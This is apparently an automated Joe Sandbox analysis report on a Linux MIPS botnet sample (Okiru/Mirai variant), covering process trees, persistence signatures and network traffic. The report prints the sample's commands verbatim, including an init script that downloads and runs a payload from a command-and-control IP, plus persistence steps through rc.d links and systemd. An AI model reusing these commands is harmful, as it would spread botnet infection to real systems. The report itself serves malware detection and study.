Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mipsel.nn.elf

Overview

General Information

Sample name:mipsel.nn.elf
Analysis ID:1580231
MD5:f0e49a9ec4b07dfc54acfd8cb9b7136b
SHA1:ec3d9752073bdbc98c76f2aa82ef1ee6f5939e2e
SHA256:b44c02a221356cdce2cb1cb02d5100ff7aa23ef9d0c2f92f2fdfe9cdae74fba6
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580231
Start date and time:2024-12-24 05:17:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mipsel.nn.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/10@0/0
Command:/tmp/mipsel.nn.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Gorilla Botnet Cats Came After You!
Standard Error:
  • system is lnxubuntu20
  • mipsel.nn.elf (PID: 6231, Parent: 6153, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.nn.elf
    • sh (PID: 6251, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6259, Parent: 6251)
      • systemctl (PID: 6259, Parent: 6251, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6284, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6286, Parent: 6284)
      • chmod (PID: 6286, Parent: 6284, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6287, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6292, Parent: 6287)
      • ln (PID: 6292, Parent: 6287, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6293, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
    • sh (PID: 6298, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6300, Parent: 6298)
      • chmod (PID: 6300, Parent: 6298, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mipsel.nn.elf
    • sh (PID: 6301, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6303, Parent: 6301)
      • mkdir (PID: 6303, Parent: 6301, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6304, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6309, Parent: 6304)
      • ln (PID: 6309, Parent: 6304, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
  • udisksd New Fork (PID: 6242, Parent: 799)
  • dumpe2fs (PID: 6242, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6270, Parent: 6269)
  • snapd-env-generator (PID: 6270, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6324, Parent: 799)
  • dumpe2fs (PID: 6324, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6355, Parent: 799)
  • dumpe2fs (PID: 6355, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • dash New Fork (PID: 6402, Parent: 4331)
  • rm (PID: 6402, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
  • dash New Fork (PID: 6403, Parent: 4331)
  • rm (PID: 6403, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
  • cleanup
SourceRuleDescriptionAuthorStrings
mipsel.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: mipsel.nn.elf PID: 6231JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: mipsel.nn.elfAvira: detected
        Source: mipsel.nn.elfReversingLabs: Detection: 39%
        Source: mipsel.nn.elfString: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global trafficTCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242
        Source: /tmp/mipsel.nn.elf (PID: 6231)Socket: 0.0.0.0:38242Jump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
        Source: mipsel.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: tmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/mipsel.nn.elf (PID: 6312)SIGKILL sent: pid: 6402, result: successfulJump to behavior
        Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/mipsel.nn.elf (PID: 6231)File: /etc/profileJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6231)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 6292)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 6309)File: /etc/rc.d/S99mipsel.nn.elf -> /etc/init.d/mipsel.nn.elfJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6231)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6286)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6300)File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6395/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6394/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6355/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6410/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/4331/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6412/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6059/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6411/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/3021/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6391/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6390/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6393/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6370/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6392/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/799/cmdlineJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6369/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6402/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6405/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6404/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6426/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6407/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6406/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6409/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6408/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6384/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6383/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6386/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6385/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6388/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6421/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6387/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6420/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6423/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6389/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6422/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6380/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6382/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6381/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6414/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6413/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6416/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6415/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6418/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6417/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6312)File opened: /proc/6419/statusJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6251)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6284)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6287)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6293)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6298)Shell command executed: sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6301)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6304)Shell command executed: sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 6286)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 6300)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/mipsel.nn.elfJump to behavior
        Source: /bin/sh (PID: 6303)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /usr/bin/dash (PID: 6402)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYasJump to behavior
        Source: /usr/bin/dash (PID: 6403)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYasJump to behavior
        Source: /bin/sh (PID: 6259)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6231)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6286)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6300)File: /etc/init.d/mipsel.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/mipsel.nn.elf (PID: 6231)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/mipsel.nn.elf (PID: 6231)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 6293)Writes shell script file to disk with an unusual file extension: /etc/init.d/mipsel.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/mipsel.nn.elf (PID: 6231)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 6293)File: /etc/init.d/mipsel.nn.elfJump to dropped file
        Source: /tmp/mipsel.nn.elf (PID: 6231)Queries kernel information via 'uname': Jump to behavior
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: /etc/qemu-binfmtP
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.nn.elf
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmpBinary or memory string: /tmp/qemu-open.EBsJ7m
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.EBsJ7m\
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: U0!/usr/bin/vmtoolsd
        Source: mipsel.nn.elf, 6231.1.000055a45f69f000.000055a45f747000.rw-.sdmpBinary or memory string: /etc/qemu-binfmtP /proc/2761/exeddressbooQ
        Source: mipsel.nn.elf, 6231.1.00007ffe0f8e1000.00007ffe0f902000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: mipsel.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: mipsel.nn.elf PID: 6231, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: mipsel.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6231.1.00007f4bec400000.00007f4bec41c000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: mipsel.nn.elf PID: 6231, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580231 Sample: mipsel.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 80 51 94.156.227.234, 38242, 60008, 60010 NETIXBG Bulgaria 2->51 53 109.202.202.202, 80 INIT7CH Switzerland 2->53 55 3 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 8 mipsel.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 63 Sample tries to set files in /etc globally writable 8->63 65 Sample tries to persist itself using /etc/profile 8->65 67 Drops files in suspicious directories 8->67 69 Sample tries to persist itself using System V runlevels 8->69 18 mipsel.nn.elf sh 8->18         started        20 mipsel.nn.elf sh 8->20         started        22 mipsel.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/mipsel.nn.elf, POSIX 24->49 dropped 71 Drops files in suspicious directories 24->71 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 mipsel.nn.elf 24->41         started        signatures9 process10 signatures11 73 Sample tries to set files in /etc globally writable 28->73 75 Sample tries to persist itself using System V runlevels 31->75
        SourceDetectionScannerLabelLink
        mipsel.nn.elf39%ReversingLabsLinux.Backdoor.Mirai
        mipsel.nn.elf100%AviraEXP/ELF.Mirai.W
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        /etc/rc.local0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/smipsel.nn.elffalse
          high
          http://94.156.227.233/mipsel.nn.elf, mipsel.nn.elf.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            54.171.230.55
            unknownUnited States
            16509AMAZON-02USfalse
            109.202.202.202
